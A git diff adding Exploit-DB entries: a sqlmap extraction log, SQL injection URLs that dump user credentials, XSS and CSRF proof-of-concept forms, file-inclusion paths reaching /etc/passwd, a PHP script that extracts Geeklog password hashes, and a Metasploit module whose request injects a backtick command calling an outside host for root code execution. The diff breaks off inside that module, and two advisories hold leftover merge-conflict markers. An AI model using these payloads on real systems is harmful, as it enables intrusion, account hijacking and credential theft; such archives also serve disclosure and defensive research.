payloads to prevent potential errors +[11:50:31] [INFO] adjusting time delay to 3 seconds due to good response times +9 +[11:50:33] [INFO] retrieved: ap +[11:53:39] [ERROR] invalid character detected. retrying.. +[11:53:39] [WARNING] increasing time delay to 4 seconds +ps +[11:56:31] [INFO] retrieved: ares +[12:00:00] [INFO] retrieved: ares_emails +[12:08:38] [INFO] retrieved: campaigns +[12:18:08] [INFO] retrieved: links +[12:24:28] [ERROR] invalid character detected. retrying.. +[12:24:28] [WARNING] increasing time delay to 5 seconds + +[12:24:31] [INFO] retrieved: lists +[12:29:49] [INFO] retrieved: login +[12:36:33] [ERROR] invalid character detected. retrying.. +[12:36:33] [WARNING] increasing time delay to 6 seconds + +[12:36:37] [INFO] retrieved: queue +[12:43:51] [INFO] retrieved: subscribers +Database: sendy +[9 tables] ++-------------+ +| apps | +| ares | +| ares_emails | +| campaigns | +| links | +| lists | +| login | +| queue | +| subscribers | ++-------------+ + +[13:00:16] [INFO] fetched data logged to text files under '/usr/share/sqlmap/output/server1' + +[*] shutting down at 13:00:16 + diff --git a/platforms/php/webapps/32816.txt b/platforms/php/webapps/32816.txt new file mode 100755 index 000000000..c9577d97f --- /dev/null +++ b/platforms/php/webapps/32816.txt @@ -0,0 +1,7 @@ +source: http://www.securityfocus.com/bid/33908/info + +Orooj CMS is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. + +Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. + +http://www.example.com/news.php?nid=-1+union+select+1,2,3,4,5,concat(sm_username,char(58),sm_password),7,8,9+from+tbl_site_member \ No newline at end of file diff --git a/platforms/php/webapps/32819.txt b/platforms/php/webapps/32819.txt new file mode 100755 index 000000000..045371a07 --- /dev/null +++ b/platforms/php/webapps/32819.txt @@ -0,0 +1,10 @@ +source: http://www.securityfocus.com/bid/33914/info + +Parsi PHP CMS is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. + +Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. + +Parsi PHP CMS 2.0.0 is vulnerable; other versions may also be affected. + +http://www.example.com/[p4th]/index.php?Cat=-9999'+union+select+1,2,3,concat(user_username,char(58),user_password),5,6,7,8,9,10,11,12,13,14,15,16+from+parsiphp_u +ser/* \ No newline at end of file diff --git a/platforms/php/webapps/32823.txt b/platforms/php/webapps/32823.txt new file mode 100755 index 000000000..abeccd5bd --- /dev/null +++ b/platforms/php/webapps/32823.txt @@ -0,0 +1,20 @@ +source: http://www.securityfocus.com/bid/33931/info + +Irokez Blog is prone to multiple input-validation vulnerabilities: + +- A cross-site scripting issue +- An SQL-injection issue +- Multiple remote file-include issues + +Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, execute arbitrary code, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. + +Irokez Blog 0.7.3.2 is vulnerable; other versions may also be affected. + + +http://www.example.com/blog/life/15' and ascii(substring((select concat(login,0x3a,pass) from icm_users limit 0,1),1,1)) between 100 and '115 +http://www.example.com/blog/life/15' and ascii(substring((select concat(login,0x3a,pass) from icm_users limit 0,1),1,1))='114 + +http://www.example.com/modules/tml/block.tag.php?GLOBALS[PTH][classes]=[include] +http://www.example.com/scripts/sitemap.scr.php?GLOBALS[PTH][classes]=[include] +http://www.example.com/thumbnail.php?module=gallery&GLOBALS[PTH][classes]=[include] +http://www.example.com/spaw/spaw_control.class.php?GLOBALS[spaw_root]=[include] \ No newline at end of file diff --git a/platforms/php/webapps/32827.txt b/platforms/php/webapps/32827.txt new file mode 100755 index 000000000..3a4ddca80 --- /dev/null +++ b/platforms/php/webapps/32827.txt @@ -0,0 +1,7 @@ +source: http://www.securityfocus.com/bid/33943/info + +Afian is prone to a directory-traversal vulnerability because it fails to sufficiently sanitize user-supplied input data. + +Exploiting the issue may allow an attacker to obtain sensitive information that could aid in further attacks. + +http://www.example.com/path/css/includer.php?files=PATH_TO_FILES diff --git a/platforms/php/webapps/32828.txt b/platforms/php/webapps/32828.txt new file mode 100755 index 000000000..ccfabf3c9 --- /dev/null +++ b/platforms/php/webapps/32828.txt @@ -0,0 +1,11 @@ +source: http://www.securityfocus.com/bid/33944/info + +Yektaweb Academic Web Tools CMS is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied input. + +Attacker-supplied HTML and script code would execute in the context of the affected site, potentially allowing the attacker to steal cookie-based authentication credentials. + +Academic Web Tools CMS 1.5.7 is vulnerable; other versions may also be affected. + +http://www.example.com/login.php?slct_pg_id=53&sid=1*/-->&slc_lang=fa +http://www.example.com/page_arch.php?slc_lang=fa&sid=1&logincase=*/--> +http://www.example.com/page.php?sid=1&slc_lang=en&redirect=*/--> diff --git a/platforms/php/webapps/32830.txt b/platforms/php/webapps/32830.txt new file mode 100755 index 000000000..4f5c5ad0b --- /dev/null +++ b/platforms/php/webapps/32830.txt @@ -0,0 +1,50 @@ +# Exploit Title: CubeCart 5.2.8 Session Fixation +# Exploit Author: James Sibley (absane) +# Blog: http://www.pentester.co +# Download link: http://www.cubecart.com/download/5.2.8/zip +# Discovery date: March 14th, 2014 +# Vendor notified: March 15th, 2014 +# Vendor fixed: April 10th, 2014 +# Vendor ack: http://forums.cubecart.com/topic/48427-cubecart-529-relased/ +# CVE assignment: CVE-2014-2341 + +CubeCart 5.2.8 is vulnerable to a session fixation vulnerability. + +The only protection offered is via the User-Agent header field, which can spoofed to match the victim. + +======================= +=Proof of Concept.....= +======================= + +*Set the User-Agent for both attacker and victim: +Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0) + +*To attack a customer: +Victim visits: http://[CubeCart Site]/index.php?PHPSESSID=1337 + +*To attack an administrator: +Victim visits: http://[CubeCart Site]/admin.php?PHPSESSID=1337 + +When the victim logs in, the attacker can visit the same link (using the same User-Agent) and hijack the victim's session. + +======================= +=Cause................= +======================= + +The PHPSESSID parameter is not ignored and allows an attacker to specify their own session id. + +The code handling login procedures do not generate new sessions upon successful authentication. + +======================= +=Mitigation...........= +======================= + +Upgrade to CubeCart >= 5.2.9 + +If upgrading is not an option, here is a hackish workaround for the session fixation vulnerability: + +In admin.class.php add this at line 324: +$GLOBALS['session']->restart(); + +In user.class.php add this at line 227: +$GLOBALS['session']->restart(); \ No newline at end of file diff --git a/platforms/php/webapps/32831.txt b/platforms/php/webapps/32831.txt new file mode 100755 index 000000000..12eec4be2 --- /dev/null +++ b/platforms/php/webapps/32831.txt @@ -0,0 +1,36 @@ +########################################################### +[~] Exploit Title: Microweber CMS v0.93 CSRF Vulnerability +[~] Author: sajith +[~] version: Microweber CMS v0.93 +[~]Vendor Homepage: http://microweber.com/ +[~] vulnerable app link:http://microweber.com/download +########################################################### + +[*] Application is vulnerable to CSRF.below is the POC where attacker can +use this vulnerability to create new user and assign Admin role to the user + + + +POC by sajith shetty + + +
+ + + + + + + + + + + +
+ + + diff --git a/platforms/php/webapps/32835.txt b/platforms/php/webapps/32835.txt new file mode 100755 index 000000000..9e1831fae --- /dev/null +++ b/platforms/php/webapps/32835.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/33968/info + +NovaBoard is prone to an HTML-injection vulnerability and a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. + +An attacker may leverage the issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials, control how the site is rendered to the user, or launch other attacks. + +NovaBoard 1.0.1 is vulnerable; other versions may also be affected. + +http://www.example.com/index.php?page=search&search=%22%3E%3Cscript%3Ealert(document.cookie)%3C%2Fscript%3E&author_id=&author=&startdate=&enddate=&pf=1&topic= diff --git a/platforms/php/webapps/32840.txt b/platforms/php/webapps/32840.txt new file mode 100755 index 000000000..9e37160ed --- /dev/null +++ b/platforms/php/webapps/32840.txt @@ -0,0 +1,10 @@ +source: http://www.securityfocus.com/bid/34016/info + +Amoot Web Directory is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. + +Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. + +http://www.example.com/[Path]/modir + +Username:admin +Password: ' or ' \ No newline at end of file diff --git a/platforms/php/webapps/32841.txt b/platforms/php/webapps/32841.txt new file mode 100755 index 000000000..08c594402 --- /dev/null +++ b/platforms/php/webapps/32841.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/34017/info + +CMSCart is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. + +Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. + +CMSCart 1.04 is vulnerable; other versions may also be affected. + +http://www.example.com/cmscart/index.php?MenuLevel1=%27 \ No newline at end of file diff --git a/platforms/php/webapps/32842.txt b/platforms/php/webapps/32842.txt new file mode 100755 index 000000000..db7f02787 --- /dev/null +++ b/platforms/php/webapps/32842.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/34018/info + +UMI CMS is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data. + +An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. + +Versions prior to UMI CMS 2.7.1 (build 10856) are vulnerable. + +http://www.example.com/market/[content_dir]/?fields_filter[price][0]=%22%3E%3Cscript%3Ealert('XSS')%3C/script%3E&fields_filter[price][1]=1 diff --git a/platforms/php/webapps/32843.txt b/platforms/php/webapps/32843.txt new file mode 100755 index 000000000..a24cf4653 --- /dev/null +++ b/platforms/php/webapps/32843.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/34021/info + +TinX CMS is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. + +Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. + +Versions prior to TinX CMS 3.5.1 are vulnerable. + +http://www.example.com/system/rss.php?id=1'SQL-code \ No newline at end of file diff --git a/platforms/php/webapps/32844.txt b/platforms/php/webapps/32844.txt new file mode 100755 index 000000000..b2af7f308 --- /dev/null +++ b/platforms/php/webapps/32844.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/34038/info + +PHORTAIL is prone to multiple HTML-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data. + +Attacker-supplied HTML or JavaScript code could run in the context of the affected site, potentially allowing the attacker to steal cookie-based authentication credentials and to control how the site is rendered to the user; other attacks are also possible. + +PHORTAIL 1.2.1 is vulnerable; other versions may also be affected. + +PHORTAIL v1.2.1 XSS Vulnerability 
 Module : PHORTAIL 1.2.1 download : http://www.phpscripts-fr.net/scripts/download.php?id=330 Vul : XSS Vulnerability file : poster.php Author : Jonathan Salwan Mail : submit [AT] shell-storm.org Web : http://www.shell-storm.org

=>Pseudo
=>E-mail
=>XSS vulnerability
=>text

\ No newline at end of file diff --git a/platforms/php/webapps/32846.txt b/platforms/php/webapps/32846.txt new file mode 100755 index 000000000..b84e17b09 --- /dev/null +++ b/platforms/php/webapps/32846.txt @@ -0,0 +1,10 @@ +source: http://www.securityfocus.com/bid/34067/info + +Nenriki CMS is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. + +Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. + +Nenriki CMS 0.5 is vulnerable; other versions may also be affected. + +javascript:document.cookie ="password=1; path=/" then +javascript:document.cookie ="ID=' union select 0,0,0,concat(id,name,char(58),password),0,0 from users--; path=/" \ No newline at end of file diff --git a/platforms/php/webapps/32852.txt b/platforms/php/webapps/32852.txt new file mode 100755 index 000000000..3ba8427e8 --- /dev/null +++ b/platforms/php/webapps/32852.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/34105/info + +TikiWiki is prone to a cross-site scripting vulnerability. + +An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site and to steal cookie-based authentication credentials. + +TikiWiki 2.2 through 3.0 beta1 are vulnerable. + +http://www.example.com/tiki-galleries.php/>"> \ No newline at end of file diff --git a/platforms/php/webapps/32853.txt b/platforms/php/webapps/32853.txt new file mode 100755 index 000000000..5190a760f --- /dev/null +++ b/platforms/php/webapps/32853.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/34106/info + +TikiWiki is prone to a cross-site scripting vulnerability. + +An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site and to steal cookie-based authentication credentials. + +TikiWiki 2.2 through 3.0 beta1 are vulnerable. + +http://www.example.com/tiki-list_file_gallery.php/>"> \ No newline at end of file diff --git a/platforms/php/webapps/32854.txt b/platforms/php/webapps/32854.txt new file mode 100755 index 000000000..2cd18a88e --- /dev/null +++ b/platforms/php/webapps/32854.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/34107/info + +TikiWiki is prone to a cross-site scripting vulnerability. + +An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site and to steal cookie-based authentication credentials. + +TikiWiki 2.2 through 3.0 beta1 are vulnerable. + +http://www.example.com/tiki-listpages.php/>"> \ No newline at end of file diff --git a/platforms/php/webapps/32861.txt b/platforms/php/webapps/32861.txt new file mode 100755 index 000000000..f2eed0032 --- /dev/null +++ b/platforms/php/webapps/32861.txt @@ -0,0 +1,11 @@ +[+] Local File Inclusion in WordPress Theme LineNity +[+] Date: 13/04/2014 +[+] Risk: High +[+] Author: Felipe Andrian Peixoto +[+] Vendor Homepage: http://themeforest.net/item/linenity-clean-responsive-wordpress-magazine/4417803 +[+] Contact: felipe_andrian@hotmail.com +[+] Tested on: Windows 7 and Linux +[+] Vulnerable File: download.php +[+] Exploit : http://host/wp-content/themes/linenity/functions/download.php?imgurl=[ Local File Inclusion ] +[+] PoC: http://localhost/wp-content/themes/linenity/functions/download.php?imgurl=../../../../index.php + http://localhost/wordpress/wp-content/themes/linenity/functions/download.php?imgurl=../../../../../../../../../../../../../../../etc/passwd \ No newline at end of file diff --git a/platforms/php/webapps/32867.txt b/platforms/php/webapps/32867.txt new file mode 100755 index 000000000..0a667ef49 --- /dev/null +++ b/platforms/php/webapps/32867.txt @@ -0,0 +1,61 @@ +Details +================ +Software: Quick Page/Post Redirect Plugin +Version: 5.0.3 +Homepage: http://wordpress.org/plugins/quick-pagepost-redirect-plugin/ +Advisory ID: dxw-1970-1091 +CVE: CVE-2014-2598 +CVSS: 6.8 (Medium; AV:N/AC:M/Au:N/C:P/I:P/A:P) + +Description +================ +CSRF and stored XSS in Quick Page/Post Redirect Plugin + +Vulnerability +================ +This plugin is vulnerable to a combination CSRF/XSS attack meaning that if an admin user can be persuaded to visit a URL of the attacker’s choosing (via spear phishing for instance), the attacker can insert arbitrary JavaScript into an admin page. Once that occurs the admin’s browser can be made to do almost anything the admin user could typically do such as create/delete posts, create new admin users, or even exploit vulnerabilities in other plugins. + +Proof of concept +================ +Use the following form to introduce potentially malicious JavaScript: +
+ \"> + + + +
+ +Mitigations +================ +Upgrade to version 5.0.5 or later. + +Disclosure policy +================ +dxw believes in responsible disclosure. Your attention is drawn to our disclosure policy: https://security.dxw.com/disclosure/ + +Please contact us on security@dxw.com to acknowledge this report if you received it via a third party (for example, plugins@wordpress.org) as they generally cannot communicate with us on your behalf. + +This vulnerability will be published if we do not receive a response to this report with 14 days. + +Timeline +================ + +2014-03-21: Discovered +2014-03-24: Reported to plugins@wordpress.org +2014-04-07: No response; requested an alternative email address using the author’s contact form. +2014-04-08: Re-reported direct to author +2014-04-08: Author responded, and publication agreed on or before 2014-05-06 +2014-04-10: Author reports issue fixed in version 5.0.5 + +<<<<<<< HEAD + +Discovered by dxw: +================ +Tom Adams +======= + +Discovered by dxw: +================ +Tom Adams +>>>>>>> 65c687d5cb3c4aa66c28a30a4f2aaf33169dc464 +Please visit security.dxw.com for more information. \ No newline at end of file diff --git a/platforms/php/webapps/32868.txt b/platforms/php/webapps/32868.txt new file mode 100755 index 000000000..34b18aa4b --- /dev/null +++ b/platforms/php/webapps/32868.txt @@ -0,0 +1,57 @@ +Details +================ +Software: Twitget +Version: 3.3.1 +Homepage: http://wordpress.org/plugins/twitget/ +Advisory ID: dxw-1970-435 +CVE: CVE-2014-2559 +CVSS: 6.4 (Medium; AV:N/AC:L/Au:N/C:P/I:P/A:N) + +Description +================ +CSRF/XSS vulnerability in Twitget 3.3.1 + +Vulnerability +================ +If a logged-in administrator visits a specially crafted page, options can be updated (CSRF) without their consent, and some of those options are output unescaped into the form (XSS). In this example the XSS occurs at line 755 in twitget.php. The nonce-checking should have occurred somewhere around line 661 in the same file. + +Proof of concept +================ +
+ + \"> + +
+ +Mitigations +================ +Upgrade to version 3.3.3 or later. + +Disclosure policy +================ +dxw believes in responsible disclosure. Your attention is drawn to our disclosure policy: https://security.dxw.com/disclosure/ + +Please contact us on security@dxw.com to acknowledge this report if you received it via a third party (for example, plugins@wordpress.org) as they generally cannot communicate with us on your behalf. + +This vulnerability will be published if we do not receive a response to this report with 14 days. + +Timeline +================ + +2013-07-30: Discovered +2014-03-18: Reported to plugins@wordpress.org +2014-04-09: Author reports fixed in version 3.3.3. + +<<<<<<< HEAD + +Discovered by dxw: +================ +Tom Adams +======= + +Discovered by dxw: +================ +Tom Adams +>>>>>>> 65c687d5cb3c4aa66c28a30a4f2aaf33169dc464 +Please visit security.dxw.com for more information. + \ No newline at end of file diff --git a/platforms/php/webapps/32871.txt b/platforms/php/webapps/32871.txt new file mode 100755 index 000000000..9a51d76f7 --- /dev/null +++ b/platforms/php/webapps/32871.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/34193/info + +ExpressionEngine is prone to an HTML-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in dynamically generated content. + +Attacker-supplied HTML and script code would run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user. Other attacks are also possible. + +ExpressionEngine 1.6.4 through 1.6.6 are affected. Other versions may also be vulnerable. + +chococat.gif">
52%23 \ No newline at end of file diff --git a/platforms/php/webapps/32875.txt b/platforms/php/webapps/32875.txt new file mode 100755 index 000000000..ed92cdebf --- /dev/null +++ b/platforms/php/webapps/32875.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/34232/info + +Comparison Engine Power is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. + +Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. + +Comparison Engine Power 1.0 is vulnerable; other versions may also be affected. + +http://www.example.com/comparisonengine/product.comparision.php?cat=null union all select 1,concat_ws(0x3a,id,email,password,nickname),3,4,5 from daype_users_tb--&name=GSM \ No newline at end of file diff --git a/platforms/php/webapps/32880.txt b/platforms/php/webapps/32880.txt new file mode 100755 index 000000000..c85f482d4 --- /dev/null +++ b/platforms/php/webapps/32880.txt @@ -0,0 +1,10 @@ +source: http://www.securityfocus.com/bid/34324/info + +Turnkey eBook Store is prone to a cross-site scripting vulnerability. + +An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site and to steal cookie-based authentication credentials. + +Turnkey eBook Store 1.1 is vulnerable; other versions may also be affected. + +http://www.example.com/index.php?cmd=search&keywords="> +http://www.example.com/index.php?cmd=search&keywords= \ No newline at end of file diff --git a/platforms/php/webapps/32887.txt b/platforms/php/webapps/32887.txt new file mode 100755 index 000000000..5cf04f4a8 --- /dev/null +++ b/platforms/php/webapps/32887.txt @@ -0,0 +1,14 @@ +source: http://www.securityfocus.com/bid/34348/info + +osCommerce is prone to a session-fixation vulnerability. + +Attackers can exploit this issue to hijack a user's session and gain unauthorized access to the affected application. + +The following are vulnerable: + +osCommerce 2.2 +osCommerce 3.0 Beta + +Other versions may also be affected. + +http://www.example.com/myapp/index.php?oscid=arbitrarysession \ No newline at end of file diff --git a/platforms/php/webapps/32889.txt b/platforms/php/webapps/32889.txt new file mode 100755 index 000000000..a7003b693 --- /dev/null +++ b/platforms/php/webapps/32889.txt @@ -0,0 +1,11 @@ +source: http://www.securityfocus.com/bid/34355/info + +4CMS is prone to multiple SQL-injection vulnerabilities and a local file-include vulnerability because it fails to sufficiently sanitize user-supplied data. + +Exploiting the SQL-injection issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. + +The attacker can exploit the local file-include issue to execute arbitrary local script code and obtain sensitive information that may aid in further attacks. + +http://www.example.com/frontend/article.php?aid=-9999+union+all+select+1,2,concat(username,char(58),password),4,5,6,7,8,9,10+from+users-- +http://www.example.com/frontend/articles.php?cid=-999+union+all+select+1,2,concat(username,char(58),password),4,5,6,7,8,9,10+from+users-- +http://www.example.com/frontend/index.php?chlang=../../../../etc/services%00 \ No newline at end of file diff --git a/platforms/php/webapps/32905.txt b/platforms/php/webapps/32905.txt new file mode 100755 index 000000000..bcd4b4ed0 --- /dev/null +++ b/platforms/php/webapps/32905.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/34500/info + +LinPHA is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied input data. + +Attackers can leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help attackers steal cookie-based authentication credentials and launch other attacks. + +Versions prior to LinPHA 1.3.4 are vulnerable. + +http://www.example.com/linpha-1.3.2/login.php?ref='> \ No newline at end of file diff --git a/platforms/php/webapps/32906.txt b/platforms/php/webapps/32906.txt new file mode 100755 index 000000000..17fbd5c1c --- /dev/null +++ b/platforms/php/webapps/32906.txt @@ -0,0 +1,10 @@ +source: http://www.securityfocus.com/bid/34500/info + +LinPHA is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied input data. + +Attackers can leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help attackers steal cookie-based authentication credentials and launch other attacks. + +Versions prior to LinPHA 1.3.4 are vulnerable. + +http://www.example.com/test/linpha-1.3.2/new_images.php?order=%22%3Cscript%3Ealert(1)%3C/script%3E +http://www.example.com/test/linpha-1.3.2/new_images.php?pn=%22%3Cscript%3Ealert(1)%3C/script%3E \ No newline at end of file diff --git a/platforms/php/webapps/32910.txt b/platforms/php/webapps/32910.txt new file mode 100755 index 000000000..9f0ad5295 --- /dev/null +++ b/platforms/php/webapps/32910.txt @@ -0,0 +1,10 @@ +source: http://www.securityfocus.com/bid/34551/info + +Phorum is prone to multiple cross-site scripting vulnerabilities because the application fails to sufficiently sanitize user-supplied input. + +An attacker can exploit these issues to steal cookie-based authentication credentials and launch other attacks. + +Phorum 5.2.10 and 5.2-dev are vulnerable; other versions may also be affected. + +http://www.example.com/phorum-5.2.10/admin.php?module=badwords&curr=1">", +location="http://www.victim.com/phorum-5.2.10/versioncheck.php"; \ No newline at end of file diff --git a/platforms/php/webapps/32914.php b/platforms/php/webapps/32914.php new file mode 100755 index 000000000..0efd4a242 --- /dev/null +++ b/platforms/php/webapps/32914.php @@ -0,0 +1,97 @@ +source: http://www.securityfocus.com/bid/34553/info + +Geeklog is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. + +Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. + +Geeklog 1.5.2 and earlier are vulnerable. + +tmp); $i++) { + $tmp_i = explode(";", $tmp[$i]); + $cookies .= $tmp_i[0]."; "; + } + if (stripos ($cookies, "\x70\x61\x73\x73\x77\x6f\x72\x64")) { + return $cookies; + } else { + die("[*] Unable to login!"); + } + + } + + function xtrct_prefix() { + global $host, $port, $path, $cookies, $url; + $out = _s($url, $cookies, 0, ""); + $tmp = explode("\x62\x6c\x6f\x63\x6b\x73\x5b\x5d", $out); + if (count($tmp) < 2) { + die("[!] Not logged in!"); + } + $tmp = explode("\x22", $tmp[0]); + $prefix = $tmp[count($tmp)-1]; + return $prefix; + } + + function is_checked() { + global $host, $port, $path, $cookies, $url; + $out = _s($url, $cookies, 0, ""); + $tmp = explode("\x62\x6c\x6f\x63\x6b\x73\x5b\x5d", $out); + $tmp = explode("\x3e", $tmp[1]); + $s = $tmp[0]; + if (stripos ($s, "\x22\x63\x68\x65\x63\x6b\x65\x64\x22")) { + return 1; + } else { + return 0; + } + } + + if (!$_use_ck) { + $cookies = login(); + } + + $url = "http://$host:$port".$path."usersettings.php"; + $prefix = xtrct_prefix(); + print "[*] prefix->'".$prefix."'\n"; + + if (!$_skiptest) { + run_test(); + } + if ($_test) { + die; + } + + #uncheck all boxes + $rst_sql = "0) AND 0 UNION SELECT 1,0x61646d696e5f626c6f636b FROM ".$prefix."users WHERE +".$where." LIMIT 1/*"; + $out = _s($url, $cookies, 1, "mode=savepreferences&".$prefix."blocks[0]=".urlencode($rst_sql)."&"); + #then start extraction + $c = array(); + $c = array_merge($c, range(0x30, 0x39)); + $c = array_merge($c, range(0x61, 0x66)); + $url = "http://$host:$port".$path; + $_hash = ""; + print ("[*] Initiating hash extraction ...\n"); + for ($j = 1; $j < 0x21; $j++) { + for ($i = 0; $i <= 0xff; $i++) { + $f = false; + if (in_array($i, $c)) { + $sql = "0) AND 0 UNION SELECT 1,IF(ASCII(SUBSTR(passwd FROM $j FOR +1))=$i,1,0x61646d696e5f626c6f636b) FROM ".$prefix."users WHERE ".$where." LIMIT 1/*"; + $url = "http://$host:$port".$path."usersettings.php"; + $out = _s($url, $cookies, 1, +"mode=savepreferences&".$prefix."blocks[0]=".urlencode($sql)."&"); + if (is_checked()) { + $f = true; + $_hash .= chr($i); + print "[*] Md5 Hash: ".$_hash.str_repeat("?", 0x20-$j)."\n"; + #if found , uncheck again + $out = _s($url, $cookies, 1, +"mode=savepreferences&".$prefix."blocks[0]=".urlencode($rst_sql)."&"); + break; + } + } + } + if ($f == false) { + die("\n[!] Unknown error ..."); + } + } + print "[*] Done! Cookie: geeklog=$uid; password=".$_hash.";\n"; +?> diff --git a/platforms/unix/remote/32811.txt b/platforms/unix/remote/32811.txt new file mode 100755 index 000000000..f51bbe5eb --- /dev/null +++ b/platforms/unix/remote/32811.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/33880/info + +Adobe Flash Player is prone to a remote code-execution vulnerability. + +An attacker can exploit this issue to execute arbitrary code with the privileges of the user running the application. Failed exploit attempts will likely crash the application, denying service to legitimate users. + +Versions prior to Flash Player 10.0.12.36 are vulnerable. + +http://www.exploit-db.com/sploits/32811.rar \ No newline at end of file diff --git a/platforms/unix/remote/32885.rb b/platforms/unix/remote/32885.rb new file mode 100755 index 000000000..047f984f5 --- /dev/null +++ b/platforms/unix/remote/32885.rb @@ -0,0 +1,101 @@ +Unitrends Enterprise Backup 7.3.0 + +Multiple vulnerabilities exist within this piece of software. The largest one is likely the fact that the ‘auth’ string used for authorization isn’t random at all. After authentication, any requests made by the browser send no cookies and only check this ‘auth’ param, which is completely insufficient. Because of this, unauthenticated users can know what the ‘auth’ parameter should be and make requests as the ‘root’ user. + +Unauthenticated root RCE +Because the ‘auth’ variable is not random, an unauthenticated user can post a specially crafted request to the /recoveryconsole/bpl/snmpd.php PHP script. This script does not sanitize the SNMP community string properly which allows the user to execute remote commands as the root user. A metasploit module that exploits this has been given alongside this report. Below is the actual request. To recreate, after authentication, click on Settings -> Clients, Networking, and Notifications -> SNMP and Modify the ‘notpublic’ entry to contain bash metacharacters. + +POST /recoveryconsole/bpl/snmpd.php?type=update&sid=1&comm=notpublic`telnet+172.31.16.166+4444`&enabled=1&rx=4335379&ver=7.3.0&gcv=0 HTTP/1.1 +Host: 172.31.16.99 +User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:26.0) Gecko/20100101 Firefox/26.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Connection: keep-alive +Referer: https://172.31.16.99/recoveryconsole/bpria/bin/bpria.swf?vsn=7.3.0 +Content-Type: application/x-www-form-urlencoded +Content-Length: 58 + +auth=1%3A%2Fusr%2Fbp%2Flogs%2Edir%2Fgui%5Froot%2Elog%3A100 + +----------------------------------- + +Metasploit module: + +## +# This module requires Metasploit: http//metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core' + +class Metasploit3 < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::Exploit::Remote::HttpClient + + def initialize(info={}) + super(update_info(info, + 'Name' => "Unitrends Unauthenticated Root RCE", + 'Description' => %q{ + }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'Brandon Perry ' #discovery/metasploit module + ], + 'References' => + [ + ], + 'Platform' => ['unix'], + 'Arch' => ARCH_CMD, + 'Targets' => + [ + ['Unitrends Enterprise Backup 7.3.0', {}] + ], + 'Privileged' => true, + 'Payload' => + { + 'DisableNops' => true, + 'Compat' => + { + 'PayloadType' => 'cmd', + 'RequiredCmd' => 'python telnet netcat perl' + } + }, + 'DisclosureDate' => "Mar 21 2014", + 'DefaultTarget' => 0)) + + register_options( + [ + Opt::RPORT(443), + OptBool.new('SSL', [true, 'Use SSL', true]), + OptString.new('TARGETURI', [true, 'The URI of the vulnerable instance', '/']), + ], self.class) + end + + def exploit + + pay = Rex::Text.encode_base64(payload.encoded) + get = { + 'type' => 'update', + 'sid' => '1', + 'comm' => 'notpublic`echo '+pay+'|base64 --decode|sh`', + 'enabled' => '1', + 'rx' => '4335379', + 'ver' => '7.3.0', + 'gcv' => '0' + } + + post = { + 'auth' => '1:/usr/bp/logs.dir/gui_root.log:100' + } + + 